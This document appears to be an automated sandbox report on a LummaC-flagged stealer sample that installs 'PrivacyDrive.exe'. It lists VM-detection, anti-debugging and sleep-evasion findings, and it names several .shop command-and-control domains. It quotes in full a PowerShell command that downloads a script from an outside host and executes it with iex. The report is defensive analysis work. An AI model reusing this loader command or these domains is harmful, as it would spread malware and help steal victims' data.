Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6753			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2978			Jump to behavior

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

API coverage: 1.4 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7136	Thread sleep count: 6753 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7156	Thread sleep count: 2978 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4320	Thread sleep time: -11990383647911201s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2836	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7132	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe TID: 7000	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe TID: 2588	Thread sleep time: -60000s >= -30000s	Jump to behavior

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00477BE0 FindFirstFileW,		4_2_00477BE0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00495D80 FindFirstFileW,FindClose,		4_2_00495D80

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: Amcache.hve.12.dr	Binary or memory string: VMware
Source: Amcache.hve.12.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.12.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.12.dr	Binary or memory string: VMware, Inc.
Source: PrivacyDrive.exe, 00000004.00000003.1923349621.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000002.2151995341.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1921722991.00000000011DF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW<
Source: Amcache.hve.12.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.12.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.12.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.12.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: svchost.exe, 00000003.00000002.2895794367.0000024B03A13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2896731206.0000024B09052000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2895818846.0000024B03A2B000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000002.2151995341.000000000119D000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1923349621.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000002.2151995341.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1921722991.000000000119D000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1921722991.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028857496.0000000001610000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2040432796.0000000001610000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.12.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.12.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.12.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.12.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: PrivacyDrive.exe, 00000008.00000003.2028656440.00000000015B9000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2040432796.00000000015B9000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2150460238.00000000015B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`.a
Source: Amcache.hve.12.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.12.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.12.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.12.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.12.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.12.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.12.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.12.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.12.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.12.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.12.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.12.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.12.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.12.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.12.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.12.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.12.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_051E6730 LdrInitializeThunk,

4_2_051E6730

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_0050E173 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

4_2_0050E173

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

4_2_0050E173

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_0050E640 LoadLibraryW,GetProcAddress,VirtualAlloc,

4_2_0050E640

Contains functionality to read the PEB

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F8055F mov edx, dword ptr fs:[00000030h]	4_2_00F8055F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F80B1F mov eax, dword ptr fs:[00000030h]	4_2_00F80B1F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F8116E mov eax, dword ptr fs:[00000030h]	4_2_00F8116E
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F8116F mov eax, dword ptr fs:[00000030h]	4_2_00F8116F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F80ECF mov eax, dword ptr fs:[00000030h]	4_2_00F80ECF
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F7055F mov edx, dword ptr fs:[00000030h]	8_2_00F7055F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F70B1F mov eax, dword ptr fs:[00000030h]	8_2_00F70B1F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F7116F mov eax, dword ptr fs:[00000030h]	8_2_00F7116F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F7116E mov eax, dword ptr fs:[00000030h]	8_2_00F7116E
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F70ECF mov eax, dword ptr fs:[00000030h]	8_2_00F70ECF

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_005068B4 GetModuleFileNameW,___crtMessageBoxW,GetStdHandle,_strlen,WriteFile,__invoke_watson,GetProcessHeap,

4_2_005068B4

Enables debug privileges

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_0050709C SetUnhandledExceptionFilter,UnhandledExceptionFilter,

4_2_0050709C

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: PrivacyDrive.exe	String found in binary or memory: surroundeocw.shop
Source: PrivacyDrive.exe	String found in binary or memory: covvercilverow.shop
Source: PrivacyDrive.exe	String found in binary or memory: pumpkinkwquo.shop
Source: PrivacyDrive.exe	String found in binary or memory: abortinoiwiam.shop
Source: PrivacyDrive.exe	String found in binary or memory: deallyharvenw.shop
Source: PrivacyDrive.exe	String found in binary or memory: priooozekw.shop
Source: PrivacyDrive.exe	String found in binary or memory: racedsuitreow.shop
Source: PrivacyDrive.exe	String found in binary or memory: defenddsouneuw.shop
Source: PrivacyDrive.exe	String found in binary or memory: candleduseiwo.shop

Contains functionality to simulate mouse events

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_00477990 SetWindowPos,GetWindowRect,GetCursorPos,ShowCursor,ShowCursor,SetCursorPos,mouse_event,mouse_event,mouse_event,SetCursorPos,ShowCursor,SetWindowPos,SetForegroundWindow,SetFocus,

4_2_00477990

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe "C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe"			Jump to behavior

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,FileTimeToSystemTime,GetDateFormatW,GetTimeFormatW,		4_2_00485BE0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetDateFormatW,GetTimeFormatW,		4_2_00485D60

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
